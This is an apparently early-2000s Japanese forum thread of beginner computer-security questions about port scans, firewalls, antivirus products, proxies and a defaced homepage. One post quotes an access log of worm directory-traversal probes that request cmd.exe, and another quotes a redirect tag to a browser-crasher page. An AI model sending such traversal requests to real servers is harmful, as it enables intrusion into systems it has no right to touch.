てゆーか、ほんまにただの流れ弾ちゃうんか

ほとんど知識がなくて恐縮なのですが、どなたかお答えいただけると幸いです。
個人の家のPCもADSLで繋ぎっぱなしだと、PCシャットダウンしてても
外部からアクセスされたりするのでしょうか？

IEのホームのページをYahooにしてるのですが、クリックした覚えのないところが
表示済みでリンクが紫になっているのです。
かけた覚えのない海外への電話料金の請求書が来たりもします。
当方一人暮らしなので、家族等はありえません。

よろしくお願いいたします。

ありえない。そういうオカルトちっくな事疑う前に自分のしたこと全て思い出して
反省して悔い改めなさい。
君のような初心者にはインターネットオプション→セキュリティのつまみを
情事’高’にしとくことをおすすめする。ダウンロードすらできないが。
それとADSLなら海外にダイヤルなんて事は無いはずだが。
知り合いが知らん間にかけた、とかそっちのほう疑うのが現実的だと思うぞ
どのくらいの額かにもよるが。

早々のレスありがとうございます。
そうなんですね。。。反省して悔い改めます。
海外への電話料金は騒ぐほどの高額の金額ではないです。

安心♪安心♪

>>113
知らなかったんですけど、
流れ弾、っていうのもあるんですか・・・。
ありがとうございました。

流れ弾っつうか
IPアドレスxxx.xxx.xxx.0 - xxx.xxx.xxx.255の範囲をポートスキャン
してるのとか。ピンポイントでポートスキャンじゃなくて適当に
ポートをノックしてるようなのにいちいちどうすればいいだろうって
考えるだけ無駄なので放置でいいだろって事。ちなみに、PFWでログに残る
ようなのの8割はこれだろ。（ルールちゃんと設定した状態でね）だから放置

>>116
国際通話の規制をした方がいいのでは？
その方が今後も安心してﾈｯﾄができると思います。
規制の仕方は、その担当のところにまず電話で申し込みます。
必要書類が送られてくるので、それを返信します。
控えは無かったと思うので、自分用の控えとして
ｺﾋﾟｰをとっておくのをおすすめします。
連絡先は、NTTの116にかけて聞けば教えてもらえます。
実際に規制が始まるまでには、その書類を返送して、
先方が処理してから始めて有効になるので、
早めに手続きをとることもおすすめします。

最近のApacheとかOpenSSHのようなセキュリティホールの話題は、
この板ではどのスレでやっているんですか？

>>118
今、ﾛｸﾞ見てみたんですけど、確かに教えてもらったふうでした。
詳しいご説明、どうもありがとうございました。
安心したと同時に勉強になりました。
また何かあったら、よろしくお願いいたします。

>>120
そういうのはすぐ修正Verがでるからね
そういう議論はここよりもスラッシュドットのほうがいいだろ

>>ななすさま
親切にありがとうございます。
早速明日実行します。

>>122
うーん、、
でも、Win系の話が多くて淋しい気もする。

２ちゃんねるで起きた運営系の板、ニュース板などのログ消失は、
Apacheのバージョンが古かったため、セキュリティーホールを突かれたという説あり。

低画質版（多少軽い）http://79ch.itigo.jp/gachinko_l.jpg
高画質版（重い）http://79ch.itigo.jp/gachinko_h.jpg
これは見ても大丈夫ですか？おねがいします

どっちもただのjpg
つか激しく板違い

「勇気がなくて見れない画像解説スレ」か、ここは？
しかも127親切だし。偉いなぁ。

以前ふしあなさんに引っかかったけど実害は何ですか？

なんかアパッチのバージョンあげんの、メンドッチーので放置してたら、ﾁｮﾝｺにクラクされちまったぜ。
データーふっとんだよ。どうしようか。

名前欄に　これ書くと２ｃｈログ見えるね　→　&rf&rusi&ran&ras&ran
サーバが落ちまくってる今だけかもしれないけど。

>>131
fusianasanだろ

>>131
って、でねーだろ？！

>>129
http://www.skipup.com/~niwatori/index3.htm#rimoho
に初歩的なことは書かれているので。

フリーメールとアウトルックを使うメールどっちが安全なのですか？

>>128
ごめん見てないので適当
>>135
フリメ

>>136
アウトルックを使う人が多いのはなぜなんですか？
フリーメールって何かメジャーな気がしないのですが。

>>137
OutlookならOffice入れるとたいてい入れられるから。
Outlook Express ならOfficeなしでもWinに最初からあるから。
でもって、ヲジ様方はなんかMSのものはいいと思いこんでいるから。

>>138
みんなフリーメールの登録がだるいんですね。
ＭＳと安全だと思い込んで、そのままアウトルックを使用しているんですね？

スパイソフトをAD-awareを使って駆除したのですが、
ネットワーク接続のところに作成されてしまった接続が削除できません。
無効にはできるんですが……
方法を教えてください。お願いします。

>>139
ていうか、対象がおかしくねーか？
プロバからいわゆる本メアドってのをもらうよな
その本メアドからメールを降ろしたり送信したりするクライアントソフトが
Outlook/OE。
フリメはどっかの無料鯖に自分のメールアカウントを新規にとって、
ブラウザでメール送受信などの操作するものの総称。

OEがｸｿなのは間違いないが、それの代替手段として考えるには
フリメじゃなくて、EdMaxとか電八とかの 3rd party のメーラーだろ。

>>140
ダイヤルアップネットワーク開いてそこのアイコン
削除すれば消えるじゃん。

クラッカーってなんでくるんですか？
どこかやばいサイトにいったからですか？

>142
そのアイコンを削除しようとしてもできないんです。
右クリックしても、削除の文字が灰色で選択できなくなってます。

>>144
それ名前ナニ

ローカルエリア接続無効 Realtek RTL 8139 Fami……
ローカルエリア接続１　有効　ADSLmodem-SU
1394接続　１３９４ネットアダプタ
ってなってます。

訂正
あ、二行目　ローカルエリア接続２です。
で、１３９４っていうのも無効です。

OS:Windows2000 IE5.5 NortonInternetsecurity2001で

asxのストリーミングファイルが、
http://www.yomiuri.co.jp/stream/
http://www.radiat.net/saizo/
は聞ける

http://backradio.tripod.co.jp/
http://www.metro.tokyo.jp/INET/ETC/LIVE/CHIJIVOD.HTM
は聞けない。

聞けない場合のWMPのエラーコードは、
　Error# C00D109C
です。

・ノートンをオフにすると、上記の場合でも正常に利用できます。

・ノートンの設定
＞WMP
＞アウトバウンド：netshow httpを許可

＞インバウンド
特に設定していない。

上記の設定で、
聞けるサーバーと聞けないサーバーがあるのですが、
どうしてなのでしょうか？

教えてください。よろしく、お願いします。

FWのログ見て、脳豚のせいで接続できないなら
FWが蹴った部分ログに残ってるだろうから、そこ見てみたら？

>>149

、、、それが

ノートンのログを見たのですが、ログに、残っていません。

つまり、
現在のノートンの規則には掛からない、
アラートが表示されて、新しい規則を設定するように
促される事もありません。（T_T)

追記：
・ルーターは使用していません。
・オミトロンを使用しています。

※ノートンをオフにして正常に接続できた時もオミトロンは
　通常どおり利用していました。

まったくわかんないが・・・
http://www.google.com/search?q=C00D109C+&hl=ja&lr=
でこの問題だと思われるものの議論のログ引っかかるね。
解決してんのかわかんないけど、英語読めるなら見てみると解決法あるかも。
農豚で、WMPについて全通しでできないんなら、わかんないや・・・

TCPポート:51402を誰かがつついてるみたいなんだけど、
TCPポート:51402はなんなの？
教えてください

ウイルスバスターは一年に一回3150円払うだけでソフトのバージョンアップと
ウイルス定義ファイルの更新ができるみたいだけどノートンインターネット
セキュリティーはウイルス定義ファイルのみ。

ってかいてあるけどこれはやっぱりウイルスバスターのほうがお得なの？

今日の午後からウィルスとおぼしいメールが届くようになりました。
それだけなら、以前からも良くある事なのですが。

ただ、今日のは今までのモノと違って添付ファイルが１回に付き２つで、
しかもファイル名はno_filename(速攻で削除したのでうろ覚え)なのです。
これもklezの一種なんでしょうか…。

fusianasanで、ホスト？出てくるじゃあないですか。
アレさえ分かってしまえば、
悪意ある人からいつ攻撃を受けてもおかしくないんですよね？

IRCを使いたいのだが、串を通してもソレが出てしまい困っています。
何とかならんのでしょうか？

SocksCap

あの・・・全く初心者で知識が無くて
申し訳ないんですが、
ウチの旦那が出会い系サイトの会員になって、
ネット上のメールを使ってやりとりしている
様なんです。ログインのIDナンバーはオートコンプリート（？）
で残っていて分かるのですが、パスワードが記憶させてない
らしく判りません。心当たりの言葉は全て入れたし、
ＩＤナンバーから秘密の質問というのも分かった
のですが、そっちの答えも判りません。（それが
分かるとパスワードも分かるらしいです）そういうのって
なんか、分かる方法あるんでしょうか？このまま
ではすごく疑心暗鬼の毎日で・・・もし、
どなたか分かる人がいたら教えて貰えないでしょうか？

>>157
不正アクセス法違反

そうなんですか・・・やっぱり。
ハア・・・判りました。
すいません、ありがとうございました。

ウイルスバスターは一年に一回3150円払うだけでソフトのバージョンアップと
ウイルス定義ファイルの更新ができるみたいだけどノートンインターネット
セキュリティーはウイルス定義ファイルのみ。

ってかいてあるけどこれはやっぱりウイルスバスターのほうがお得なの？

>>154
今はそれだけでは判断できない時代。

>>160
ノートンの更新についつは知らないので、ノートンスレで聞いてください。

>>155きぼんぬんぬ。

>>155
fusianasanとIRCの関係がよく分からないが…
間違ってfusianasanしてしまったら回線切って暫らく待てばリモホは変わる。

>>162
>>156
SOCKS串
1080

>160
それより検出力やらトラブル事例の有無やら、
そっちの方が大事だと思うけど

依然TCPポートの50000番台がつっつかれています。(55838とか56307を)
ひょっとしてトロイのバックドアなんでしょうか。
ご存知の方がいらっしゃったら教えてください。

>>166
sourceポートが80だったら氏なす。

>>166
分かりっこないから気にするな。

すみません、sourceポートとは何でしょうか、
またどこを見れば解るのでしょうか

方法論ではなく可能性についてだけ教えていただきたいのですが、
今回の２ちゃんのログ消失騒動ですが、
スクリプト軽量化コンテスト参加者なら
ルート権限とってログをデリることは可能だと思いますか？

可能性なら万人にある。だから、
その「スクリプト軽量化コンテスト参加者なら」という条件は
何ら意味を成さない。

>>171
すみません。質問がまずかったですね。
使えるスクリプトがわかればバックドアから入れる可能性は
増大しますか？という意味です。

>>170
可能性は極めて低い(はず)。bbs.cgiはperlで書く事が条件だったはずなので、
mariciousコードをもぐりこませることはほぼ不可能。

あるとすればコーディングのバグかインタプリタのバグかだな

>>173
そうですか。知っているだけでは駄目なんですね。

>>174
厨な質問で申し訳ないのですが、
それは、鯖の問題と言う意味ですか？
噂によればperlのヴァージョンが古かったと聞いたのですが、
その関係なのでしょうか？

74さんはじめ、皆様、ありがとうございました。
みなさんも、ウイル〇スキャンは止めろと言うので、
ソース〇クストに、｢キャンセルする〜｣とメールを送ったら、
１月以上音信不通だっがのが、急に解答が来ました。

ダウンロードする時、かってにファイル名が
リネームされてたらしいので、ダウンロードの前に、
教えてもらった正しい名前を入力したら、うまく行きました。
キャンセルしたかったのですが、とりあえず、使ってみます
どうも、ご親切、ありがとう。

IPから個人情報を検索するＨＰを教えてください。

googleセンセに聞いてくれ

>>177
検索するサイトはないが、検索できる組織のHPならhttp://www.npa.go.jp/だ。

>>179
あらま、そうなの？
警察庁ﾀﾝいつの間にそんなシステムを・・・

要するに事件なら警察に訴え出て調べて貰えてコトでしょ
んで、そうじゃないなら諦めろてコトでしょ

>>181
警察庁に言っても困られるだけだと思うぞ。

Sｑｕｉｄの串は"FORWARDED_FOR"を必ず元ＩＰ（生）を
吐き出しちゃうの？

>>183
そうでもない設定のsquidが広いインターネットの中に何台かあるかも知れない。

>>184
ありがとうございます。
探してみます！って！探せないようですね（ｗ

Apache, OpenSSH, libc と立て続けに大物のセキュリティホールが
見つかってますが、なぜこの板ではスレが立たないんでしょう？

>>186
それらが何かわからなかったり用のないやつらしかいないから

スレが立たない、とな？
自分で立てりゃいいだろ？

>186
ここ、win使い限定ですから。

まあ、UNIX板ではsshスレ、ａｐａｃｈｅスレで語られてるし、ｌｉｎｕｘ板では
各ディストリスレで語ってるからなぁ。
まあ、チェックするべきサイトわかってるのと、ユーザー数か。

もうちょっとUNIX・Linuxスレあっても良いとは思うけどね。

>>186
そういう話題に関係する人は他の板でやってる

あの・・・
くだらない質問で申し訳ないです。
６７１８のポートにお客さんが来たのですが６７１８のポートって
何に使われてるのでしょうか？
調べても分かりませんでした

>191
http://www.iana.org/assignments/port-numbers
↑ここで見てみたけど、とくに割り当てられてないみたい

>192さん
わざわざありがとう。

じゃ、変なソフトでも入れちゃたのかな・・・
（でも、どこから出たんだろう）
因みにＵＤＰです

不明なポートへのポートスキャンは大抵トロイだろ。
そんなに珍しいか？

自分はルーターを介してのネット接続なのですが、ルーターを使った
接続の場合セキュリティソフトは必要無いのでしょうか？

>>195
ルータはアウトバウンド接続の監視ができないので
スパイウェアがPC内に入ってしまったとき発見できない。
FWソフトも入れておいたほうがいい。

>>196
入れておいたほうが良いですか、有難うございます！！

携帯サイトをPCで見るにはどうしたらいいのですか？
PCからのアクセスはできないようになっているみたいです。
多分PCからのipは弾かれるようになっていると思うのですが
どうすればいいのでしょう？

ttp://homepage3.nifty.com/girls_and_boys~/

↑
これってウィルス入りっすか？
ホラーFlashなんすけど。

久しぶりに引っかかってしまいましたｗ

ttp://jc.ws11.arena.ne.jp/dom/filez/rika.html

緑のにこちゃんマークが表示されたブラウザが移動して、閉じるとちっちゃいのが量産されたんですが、
これはブラクラですか？それともウイルスなんでしょうか？ノートン先生注意しなかったからブラクラなんだと思うんですが・・・

書く時間が悪かったのか、内容が悪かったのか・・・

内容が悪かった
ブラクラですか → ブラクラチェッカー使え
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?

ウィルスですか → アンチウィルスソフトでチェックしろ

>>200のサイトはブラクラというほどではないが、複数のウィンドウを
開かせる内容になってるだけ。ソース確認せよ。

＞202ありがとうございます

もちろん書き込む前に
ttp://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?http://jc.ws11.arena.ne.jp/dom/filez/rika.html
で調べたんですが、次に進めなくて結果がわかりませんでした。　
ビューソースも試そうと思ったんですがスペル忘れてしまって・・・見ても読めないんですけど・・・
ウイルスはさっきやっと全部チェック終わりましたが、異常なしでした。

いっぱい開くタイプと違って、これは面白いですね。邪魔ですがｗ
ソース読めるように勉強します。

ありがとうございました。多謝

>>203 ブラクラチェッカーで次に進めないのはNIS入れてるから。
拡張オプションでcoara.or.jpのリファラーを許可する。

携帯電話のメールって外部からアクセスして
中身を見る事ってできるんですか？
なんか最近そんな気がするんですけど。
削除したメールが復活してたりするし。

>>205
できない

>>203
IEでソース見るのはview-source:url
200のURLには、↓これが入ってる。有名なブラクラサイトに飛ばされるタグ。
<META HTTP-EQUIV="refresh" CONTENT="5;URL=ttp://www.raus.de/crashme/">
間違って踏まないように。

>>206
そうなんですか？
例えばセンターのメールサーバにアクセスするとか
できないんですか？

>>208
おめーさんのメールを覗き見するメリットはどこにあんのよ？
あんた政府の要人か？

>>209
勝手に決め付けるのもいかんのじゃないかな。
ストーカーに悩まされているのかもしれないし。

ちなみに俺はヘタレなんで>>208には答えられません。

>>208
アクセスは出来る、メールを読むことは出来ない

IEで、お気に入りに追加すると、
なにかを送信してるんだけど。
これは普通なの？

>>212
何も送信しません。気のせいです。

>212
お気に入り用のアイコンがないか調べに行ってるとかじゃないの？

>>209
浮気相手とのメールの内容を彼女が知ってたので
どこからアクセスしてメール見てるんじゃないかと。

>215
一番簡単な方法を教えよう。
君が知らない間に携帯を直接覗く。
ちなみに違法だ。

>>216
ちなみに何罪?

ちなみに窃盗罪。

しっかし不思議でしょうがないんだが
浮気相手とのメールばれた→彼女が鯖ﾊｯｷﾝｸﾞ？？
この思考回路はどっからくるのか
もっと、現実的なこと考えない？
彼女とその浮気相手が同一の友達もってて・・・とか
直接接触して・・・とか
そう簡単に人のメール盗み読みできるようなセキュリティ
だったらとっくに大問題だと思うんだが

現代病にかかってる人が多いようだね
意外と単純なことに気が付かない罠

近すぎて気付かない恋心

理解不能なことは全てﾊｶｰのせいという情報操作の賜物ですね。

> そう簡単に人のメール盗み読みできるようなセキュリティ
> だったらとっくに大問題だと思うんだが
でもセキュリティホールなんて、なぜ今まで気づかなかったんだというミスが多いよ。

>>222
否、ウィルスもモテまくり。
困ったらウィルス。困ったらハッカー。困ったらバグ。

課長の保存し忘れたWordのファイルは
ハッカーの手によって葬り去られる。

納期が迫ったプログラムのソースがウィルスによって削除される。

お気に入りに追加した瞬間、
ゾーンアラームが通信してる状態になるんだけど。

フォントキャッシュ破損は99%ウィルスのせいにされるな。
ウィルスかわいそうだ

>>225
>>214
読めませんか？

どこに質問していいかわからなくてこちらで伺うのですがアクセスログを眺めていると
PockyというUAがあります｡どうもあるフォルダ以下をごっそり持っていくようなのですが
何らかの情報をお持ちの方いらっしゃいますか?

はっきり実害があるとはいえないですが気持ち悪いので気になります｡

pockyってUAを持つダウンロード支援ツールがあるか

自分でUAをpockyにしてるかのどっちか。

関係ないが、UAを珍しいのにしてんのって厨房くらいだろ
（友達のBBSでUAが表示されて、それで遊んでるとかならあれだが）
珍しいブラウザつかってるからIEとかに偽装するってならわかるんだが。。。

>>229
マヌケなBBSだとUAでタグ仕込める。

ｴｰ・・・
そんなBBSあんのかよ・・・しんじらんね

>>230.231
以前、２ちゃんねるでも
UA実験時とか、メール欄にタグとか・・・以下略

書き込みは入力チェックしてもUAとかリファはそのまんまログに記録ってところが多いからなぁ。
一応これくらいはしとかないと。
< →　<
> → >

< → &lt;
> → &gt;
ね・・

>>226
無駄な糞ソフトをバカスカ入れるのが悪いのにな(藁

「218.44.39.220」という　ＩＰから毎日　PingAttackされます
どうしたら、いいですか？
一応、プロバイダはわかったのですが

どうかよろしくお願いします

>>236
証拠は？

>>237
ウイルスバスターのログがありますが
それじゃダメなんですか？

>>238
じゃあプロバイダに聞いてみれば？

>>239
レス有難うございます

一応メールはしたのですが、止めてもらえるのでしょうか？
やられたら、やり返すみたいな物ないんですかね
なんか、悔しいです。

>240
なんで悔しいのかﾜｶﾗｿ
ﾋﾟﾝﾎﾟｲﾝﾄで狙われてるわけでもなし。
なんか心当たりでも？

>>241
心当たりは、無いんです
悔しい理由は、うーん　どう表現したらいいんだろうなぁ
ピンポンダッシュされた、家の人の気持ちかな

変な例えスマソ

>>242
っつーかやり返すという幼稚なことはやめれ

>>243
冷静になってみると、おっしゃるとうりですね。
ご指摘、ありがとうございました。

ﾈｯﾄにつないでりゃ、PingAttackなんかしょっちゅうあるぞ。
気にしてたらｷﾘがない。
ﾊﾞｽﾀｰがﾌﾞﾛｯｸしてくれてるんだから、実害はなんもないだろ。

PingAttackだと騒ぐバカは、大概が割れ厨

最近　
○○へ行け　って言うと
（そこをよく調べろ　よく読めという意味なのに）
そこで　新スレ立てたり　質問するバカが増えたな

proxomitronを起動すると、何故か知らない外人がソレを踏み台に
.jpなircサーバに繋ぎやがるんですけど、仕様ですか? (TT
っていうか何でircなんかに繋がるんだろう‥‥

設定→アクセス→この PC からの〜にチェックは言ってなかったらアホ決定。
そうじゃなきゃ（踏み台にされるとは思えんが）サービスポート変えろ。

あと外部からのアクセス deny すればいいじゃん

>>249
LAN内で使えるようにローカルアドレスを範囲指定してたんですけど
旧バージョンはその辺にバグがあったらしいですね(今調べました)
パケットキャプチャ仕掛けてしばらく放置しとくと、
かなり多人数が使いに来てるんですが、そういうモノなんですか‥‥

>>251
だってあんさん、完全に元IP隠せる＆串扱いされない
最強の串でっせ
串チェックのポートスキャンとかしょっちゅうくるでしょう
外部に開けてたらすぐ使われるよ
そういう事は絶対にお勧めしないが、最低でもサービスポート
変える位はしないとダメすぎ

>>251
CyberSyndromeあたりの串リストに載ってたりして。

リモートホストが晒されると、どのようなリスクが想定されますか？

>>7

\Eドライブに，ijl11.dllとMKCD2.dllというファイルがありました．
プロパティを見ると同じ日に作成されたみたいです．
いったいこれは何のでしょう？このＰＣに何かされているのでしょうか？

アプリケーション：不明なアプリケーション

となっていました．よろしくお願いします．

んなのわかるかよ
不審だったら消すなりファイルリネーム（もし立ち上がらなくなっても
DOSから名前戻せば大丈夫なように）するなりして挙動をみてみりゃいいだろ。
ファイル名だけいわれてなんですかっつったってわかるわけねーだろ。
聞かれた方だってgoogleで検索するくらいしかできねーんだから自分でやれ。
http://www.google.com/search?hl=ja&ie=Shift_JIS&q=ijl11.dll&btnG=Google+%8C%9F%8D%F5&lr=
http://www.google.com/search?hl=ja&inlang=ja&ie=Shift_JIS&q=MKCD2.dll&btnG=Google+%8C%9F%8D%F5&lr=

これって何かされてますか?
43.225.166.60 - - [29/Jun/2002:05:53:29 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

わかんねーやつは鯖立てんな

赤虫とか煮無駄とかだろ

>>258
懐かしいねぇ。氏ね

マカフィーウイルススキャンをインストール中に
　このページでのスクリプトでエラーが発生しました
　オブジェクトでサポートされていないプロパティまたはメソッドです
と表示され、以降インストール作業が進みません。
今まで使っていたプレインストール版はアンインストールしたのですが
どうしたらよいでしょうか？　

>>262
エラーの表示をキーワードにして、ここで検索したらどうっしょ？
http://www.nai.com/japan/pqa/pqa.asp

http://members8.tsukaeru.net/tonchi/sora/index.htm
参った、書きかえられた・・・・。
トップのみなおし。。。。TT

ごめん。板違い。。。

これからノートンインターネットセキュリティか、
BlackICEのどちらを買おうか迷ってます

アドバイス等をお願いします（理由もできれば）

>>266
そんなあなたにKerioPersonalFirewall（フリーソフト）

Kerio Personal Firewall Rule3
http://pc.2ch.net/test/read.cgi/sec/1022081681/

BlackICEはPFWじゃないよ。外からの不正アクセスしかブロックしてくれません。PFWと併用するならどうぞ。

黒氷とNIS比べてるﾔｼに蹴男はないだろ・・・
穴だらけになるぞ
ぞねは勧めんが、SygateとかOutpost使ってみればいいだろう

＃なんで初心者に限って有料のソフト使おうとするのか

レスありがとうございます
初心者は黙ってZONEをつかいます

>>269
（･∀･）かしこい!!

質問です。
他者のメール等を盗み見るというネット犯罪が流行っているようですが。
その他者がアクセスしたページや、例えば２ちゃん等の掲示板に
書き込みした内容も見えてしまうハッキングというのはあるのでしょうか？

最近、とある人物を疑ってまして。
もしかしたら自分のPCの情報が
盗まれているのではないかという不安にかられています。

本当に初心者の質問ですみません。
どなたか教えてください。

>>269
ぞね使ってもいいがセキュ板でｺﾞﾐﾊﾟｹ報告だけは絶対すんなよ
>>271
＞他者のメール等を盗み見るというネット犯罪が流行っているようですが。
別に流行ってないよ

どっかのスレにもあったが、そういうハッキングまがいの事された
なんて考える前に、他にもっと現実的な思い当たる点は無いのか？
君がどんだけ偉い人かは知らんが、
不可能では無いが、普通リスクとリターンが釣り合わない行為だとだけ言っておこう。

＃まあ、トロイ踏んでたりすれば丸分かりなんだが（わら

裏口しかけても、2chの書き込み見たってしょーがない・・・

聞き逃げばっかだね

NISを有効にしておくとOutlookでメールが
送受信できなくなってしまいました。
無効にすればOKなのですが。
Outlookのインターネットアクセス設定はすべて許可にしてあります。
直し方が分かる方教えてください。

>>275
自動切断を切るか、メールスキャン機能自体を無効にするか
のどちらかしかないと、メーカーサイトに書いてある

プロキシのＢlackＪumboＤogをダウンロードしたのですが、プロキシの
アドレス、ポートとは何なのでしょうか？

>>276
TCP/IPの入門書を1冊買ってきましょう。

>>276
お答えありがとうございました。
教えていただいたサイトを確認し、
２つとも試してみましたがダメでした。
他に何かありましたら、アドバイスお願いします。

276じゃなくて277だった。

>>278
そうします。すいませんでした。

のーとんAntiVirusは再インスコすればタダなのですね？

>>282
馬鹿は帰ってください。

>>282
OSをね（ﾜﾗ

まうすが　かってに　へやじゅう　はしりだすのですが　とめる　ほうほうは　ないでしょうか？

いいってよしっっっっっ！！！！

とりあえず　ぺっとしょっぷで　ねこを　かってきましょう

プロキシ設定オンにしたら画面が表示されないのですが・・。

カーンってﾊｶｰなの？

>>288
使ってないのにチェックしても意味ありません。

>>289
ﾊｶｰっていうかサルだね。

>>290
なんだか分からないので使うのを辞めます。ありがとうございました。

>289 ｶｰﾝは相場師じゃ

板違いだったらｽﾏｿ。明らかにスパムなんだけど、
http://k.sourcenext.co.jp/media/602/WRBE00677602/hp/i/index.html
http://k.sourcenext.co.jp/media/602/WRBE00677602/hp/j/index.html
これって何？ソースネクストみたいなんだけど・・・。

すくりーん　せいばーを　みると　きもちがわるくなってきて　はきけがするのですが、だいじょうぶでしょうか？

http://www.sourcenext.com/

ウイルスバスター、マカフィー、ノートン
どれがベスト？？

>>297
ノー�d

最近ファイアウォールにtracerouteで引っかかるIPがあるのですが、放っておいても大丈夫でしょうか？
IPドメインサーチの存在を知ったので、自分なりに調べてみようとしましたが、何の事やら全然理解できません。
どなたか御教示お願いします。
相手のIPは127.1.1.1で、こちらの環境はMe,IE5.5sp2,バスター2002を常駐させています。
ちなみに、履歴やcookieを消しても接触があり、Ad-awareで定期的にチェックもかけています。

IPがばれると実際にどうヤバインですか？

　昨夜から今日にかけ、某社無料サーバーにおいていたHPのトップページ
　が、何者かによってアダルト画像に書き換えられてました。
　一応、その某社には連絡のメールを入れておいたのですが・・・

　どうしたらいいんですかね？

>>301
パスワード変える。なるべくなが〜いものに。

　>>302さん

　やっぱり進入経路って、そういう経路になるんですか・・・。
　HPビルダーとFFFTPを使用しているのですが、この辺から
　漏れたということはないのでしょうか？

>>299
ネタ？それにしてはツマランけど。ネタじゃないなら貴方は
「鏡に写った自分の姿を見て敵だと思いフーッと唸っている猫」と同じです。

>>303
パスワードを一文字ずつ変えながら全部の組み合わせを総当り法で試して
パスワード破りするソフトでも使ってるんじゃないの、相手は？
それだと、５〜６桁のパスワードならあっという間でしょう、よく知らないけど。
あなたのPCに侵入して盗んだとか、途中の経路で盗み見たとか、
そういう可能性は低いのではないかと。

>304殿
判りやすい回答ありがとうございます。
バスター入れた当初は出なかったので、そうとは思いもしませんでした。
それにしてもネタと思われる程、程度の低い質問だったとは…
もう少し勉強してから出直してきます。

>>306
ループバックアドレス→自分のパソ自身
127.0.0.0〜127.255.255.255

web上でマイＰＣをポートスキャンしてくれるページってどこだっけ？

つるっ禿げガイシュツですんませんが

>>3

>309
あんがと！

>>308
こゆ奴かな？
Shields up
http://grc.com/default.htm

Privacy Analysis of your Internet
http://privacy.net/analyze/

海外掲示板に書き込んだんですが機嫌損ねたらハッキングとかされますか？
チョソン怖いんですけど。やべーもう駄目か？

>>312
一旦接続切るとIPアドレス変わる環境なら、そんなに心配ないような気が。

>>306
勉強する気があるのならTCP/IP関連書籍を読むのも良いが、バスターのPFWは止めて
この板にスレのあるフリーのPFWを使うのが実践的で良いと思う。
とりあえずバスターのPFWは止めれ、あれはPFWといえない糞だから。バスターはAVの機能のみ
使用すればよろし。
お勧めはOutpost、Sygate、Kerioの3種だが
難易度・・・・・・Outpost＜Sygate＜Kerio　（Kerioが初心者には一番難しい）
勉強になる度・・・・・・Outpost＜Sygate≦Kerio
てな感じかな。但しバスターのPFW機能をはずして他のPFWインストールするのは
ちょっと手順が必要なので関連スレ読んで調べてくれ。

>>313
ありがとうございます。
F5攻撃で有名な奴らが敵になったら嫌だなあ。

　>>305さん

　たびたびありがとう御座います。
　あんまり書くとどこの無料サーバかばれそうですが、
　そこは8桁でした。

　いやーしかし、有名サイトならともかく、まさか自分のHPで
　こんなことになるなんて、おもってもみませんでした。
　無料HPつかってるようなサイトなのに・・・。

>>311
サンクス！

でも、確か日本語のサイトが有ったと思うんだけど
日本語の方は分かりませんか？


質問は >>308 でっす

＞cheshire-cat殿
　ありがとうございます。2002スレの書き込みも参考にさせていただいています。
＞314殿
　バスターのPFWは糞ですか（ｗ　当座の目標が出来ました。頑張ってみます。
　　　　　

>>317
日本語のは、ちょっとわかりかねます。

>319
ご丁寧に有難う御座います。

これから過去ログをﾌﾞﾙｰﾄﾌｫｰｽｱﾀｯｸしてみまっす

>>317
http://security2.norton.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=22&pkj=NWDBMRSJRFSKLUKUMXC

>>321
あ。

＞321
おぉ！！
おりがとデス！
感謝、感謝♪

「GET要求」の正確な定義が知りたいのです。
ページに含まれる画像ファイルなどのリクエストも、GET要求数に含まれますか？

RFC嫁

コピーコントロールＣＤのロックはどうやって外せばいいんですか？
通勤用にＣＤ−Ｒでベスト版を作りたいんですが・・・。
　どなたかご存知でしたら教えてください。

>>324意味不明。そして板違い。

>>326
板違い

>>326
そんなこともできんバカは氏ね

これって危険なのでしょうか？
http://usagi.tadaima.com/2chbbs/subback.html
ちなみにここで引っ掛かりました。
http://music.2ch.net/test/read.cgi/classic/1011569496/459

>>330
どんな情報が相手に漏れましたか？
Javaとか使っているとヤバイかもね。
